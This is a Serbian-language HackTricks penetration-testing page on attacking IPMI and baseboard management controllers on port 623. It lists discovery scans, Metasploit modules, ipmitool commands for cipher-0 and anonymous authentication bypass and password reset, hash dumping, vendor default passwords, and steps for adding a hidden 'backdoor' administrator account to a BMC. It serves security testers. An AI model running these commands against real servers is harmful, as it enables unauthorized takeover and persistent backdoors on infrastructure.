10 KiB
623/UDP/TCP - IPMI
623/UDP/TCP - IPMI
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite vašu kompaniju reklamiranu na HackTricks-u ili preuzmete HackTricks u PDF formatu proverite SUBSCRIPTION PLANS!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
Osnovne informacije
Pregled IPMI-ja
Inteligentni interfejs za upravljanje platformom (IPMI) nudi standardizovan pristup za daljinsko upravljanje i nadgledanje računarskih sistema, nezavisno od operativnog sistema ili stanja napajanja. Ova tehnologija omogućava sistem administratorima da upravljaju sistemima daljinski, čak i kada su isključeni ili neodzivni, i posebno je korisna za:
- Konfiguracije pre pokretanja operativnog sistema
- Upravljanje isključivanjem
- Obnova nakon neuspeha sistema
IPMI je sposoban da nadgleda temperature, napon, brzinu ventilatora i napajanja, kao i da pruža informacije o inventaru, pregleda logove hardvera i šalje upozorenja putem SNMP-a. Za njegov rad su neophodni izvor napajanja i LAN veza.
Od svog predstavljanja od strane Intela 1998. godine, IPMI je podržan od strane brojnih prodavaca, poboljšavajući mogućnosti daljinskog upravljanja, posebno sa podrškom verzije 2.0 za serijski preko LAN-a. Ključni komponenti uključuju:
- Baseboard Management Controller (BMC): Glavni mikrokontroler za IPMI operacije.
- Komunikacione magistrale i interfejsi: Za internu i eksternu komunikaciju, uključujući ICMB, IPMB i različite interfejse za lokalne i mrežne veze.
- IPMI memorija: Za skladištenje logova i podataka.
Podrazumevani port: 623/UDP/TCP (Obično se koristi UDP, ali može se koristiti i TCP)
Enumeracija
Otkrivanje
nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use auxiliary/scanner/ipmi/ipmi_version
Možete identifikovati verziju koristeći:
use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10
IPMI Ranjivosti
U domenu IPMI 2.0, otkrivena je značajna sigurnosna propustljivost od strane Dana Farmera, koja otkriva ranjivost putem šifarskog tipa 0. Ova ranjivost, detaljno dokumentovana na Dan Farmerovom istraživanju, omogućava neovlašćeni pristup sa bilo kojom lozinkom, pod uslovom da je ciljani korisnik validan. Ova slabost je pronađena na različitim BMC-ovima od proizvođača kao što su HP, Dell i Supermicro, što ukazuje na široko rasprostranjenu problematiku unutar svih implementacija IPMI 2.0.
IPMI Bypass autentifikacije putem šifre 0
Da biste otkrili ovu manu, možete koristiti sledeći Metasploit pomoćni skener:
use auxiliary/scanner/ipmi/ipmi_cipher_zero
Eksploatacija ove greške je moguća pomoću ipmitool
-a, kao što je prikazano u nastavku, omogućavajući listanje i izmenu korisničkih lozinki:
apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password
IPMI 2.0 RAKP Autentifikacija - Preuzimanje udaljenog heša lozinke
Ova ranjivost omogućava preuzimanje soljenih heširanih lozinki (MD5 i SHA1) za bilo koji postojeći korisnički nalog. Da biste testirali ovu ranjivost, Metasploit nudi modul:
msf > use auxiliary/scanner/ipmi/ipmi_dumphashes
IPMI Anonimna Autentifikacija
Podrazumevana konfiguracija u mnogim BMC-ovima omogućava "anonimni" pristup, koji se karakteriše praznim korisničkim imenom i lozinkom. Ova konfiguracija može biti iskorišćena za resetovanje lozinki korisničkih naloga koji imaju imena koristeći ipmitool
:
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword
Supermicro IPMI lozinke u čistom tekstu
Kritičan dizajnerski izbor u IPMI 2.0 zahteva skladištenje lozinki u čistom tekstu unutar BMC-a u svrhu autentifikacije. Supermicro-ovo skladištenje ovih lozinki na lokacijama poput /nv/PSBlock
ili /nv/PSStore
izaziva značajne sigurnosne probleme:
cat /nv/PSBlock
Supermicro IPMI UPnP Vulnerabilnost
Uključivanje Supermicro UPnP SSDP slušača u IPMI firmware, posebno na UDP portu 1900, predstavlja ozbiljan sigurnosni rizik. Ranjivosti u Intel SDK za UPnP uređaje verzije 1.3.1, kako je detaljno opisano u Rapid7-ovom otkrivanju, omogućavaju pristup root nalogu BMC-a:
msf> use exploit/multi/upnp/libupnp_ssdp_overflow
Brute Force
HP nasumično generiše podrazumevanu lozinku za svoj proizvod Integrated Lights Out (iLO) tokom proizvodnje. Ova praksa se razlikuje od drugih proizvođača koji obično koriste statične podrazumevane akreditive. Pregled podrazumevanih korisničkih imena i lozinki za različite proizvode je sledeći:
- HP Integrated Lights Out (iLO) koristi fabrički generisanu nisku od 8 karaktera kao podrazumevanu lozinku, što pokazuje veći nivo bezbednosti.
- Proizvodi poput Dell-ovog iDRAC-a, IBM-ovog IMM-a i Fujitsu-ovog Integrated Remote Management Controller-a koriste lako pogodne lozinke poput "calvin", "PASSW0RD" (sa nulom) i "admin" redom.
- Slično tome, Supermicro IPMI (2.0), Oracle/Sun ILOM i ASUS iKVM BMC takođe koriste jednostavne podrazumevane akreditive, pri čemu su njihove lozinke "ADMIN", "changeme" i "admin" redom.
Pristupanje Hostu putem BMC-a
Administrativni pristup Baseboard Management Controller-u (BMC) otvara različite puteve za pristup operativnom sistemu hosta. Jednostavan pristup uključuje iskorišćavanje funkcionalnosti BMC tastature, video zapisa i miša (KVM). To se može postići ili ponovnim pokretanjem hosta do root ljuske putem GRUB-a (korišćenjem init=/bin/sh
) ili pokretanjem sa virtuelnog CD-ROM-a postavljenog kao spasilački disk. Ove metode omogućavaju direktno manipulisanje diskom hosta, uključujući umetanje zadnjih vrata, izvlačenje podataka ili bilo koje neophodne radnje za procenu bezbednosti. Međutim, to zahteva ponovno pokretanje hosta, što je značajan nedostatak. Bez ponovnog pokretanja, pristupanje pokrenutom hostu je složenije i razlikuje se u zavisnosti od konfiguracije hosta. Ako je fizička ili serijska konzola hosta ostala prijavljena, lako je preuzeti kontrolu putem BMC-ovih KVM ili serijsko-preko-LAN (sol) funkcionalnosti putem ipmitool
-a. Istraživanje iskorišćavanja deljenih hardverskih resursa, poput i2c magistrale i Super I/O čipa, je oblast koja zahteva dalje istraživanje.
Uvođenje zadnjih vrata u BMC sa hosta
Nakon kompromitovanja hosta opremljenog BMC-om, lokalno BMC sučelje može se iskoristiti za umetanje korisničkog naloga zadnjih vrata, stvarajući trajno prisustvo na serveru. Ovaj napad zahteva prisustvo ipmitool
-a na kompromitovanom hostu i aktivaciju podrške za BMC drajvere. Sledeće komande ilustruju kako se novi korisnički nalog može ubaciti u BMC koristeći lokalno sučelje hosta, što zaobilazi potrebu za autentifikacijom. Ova tehnika se može primeniti na širok spektar operativnih sistema, uključujući Linux, Windows, BSD i čak DOS.
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID Name Callin Link Auth IPMI Msg Channel Priv Limit
2 ADMIN true false false Unknown (0x00)
3 root true false false Unknown (0x00)
4 backdoor true false true ADMINISTRATOR
Shodan
port:623
Reference
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!
Drugi načini podrške HackTricks-u:
- Ako želite da vidite vašu kompaniju reklamiranu u HackTricks-u ili preuzmete HackTricks u PDF formatu proverite SUBSCRIPTION PLANS!
- Nabavite zvanični PEASS & HackTricks swag
- Otkrijte The PEASS Family, našu kolekciju ekskluzivnih NFT-ova
- Pridružite se 💬 Discord grupi ili telegram grupi ili nas pratite na Twitter-u 🐦 @carlospolopm.
- Podelite svoje hakovanje trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.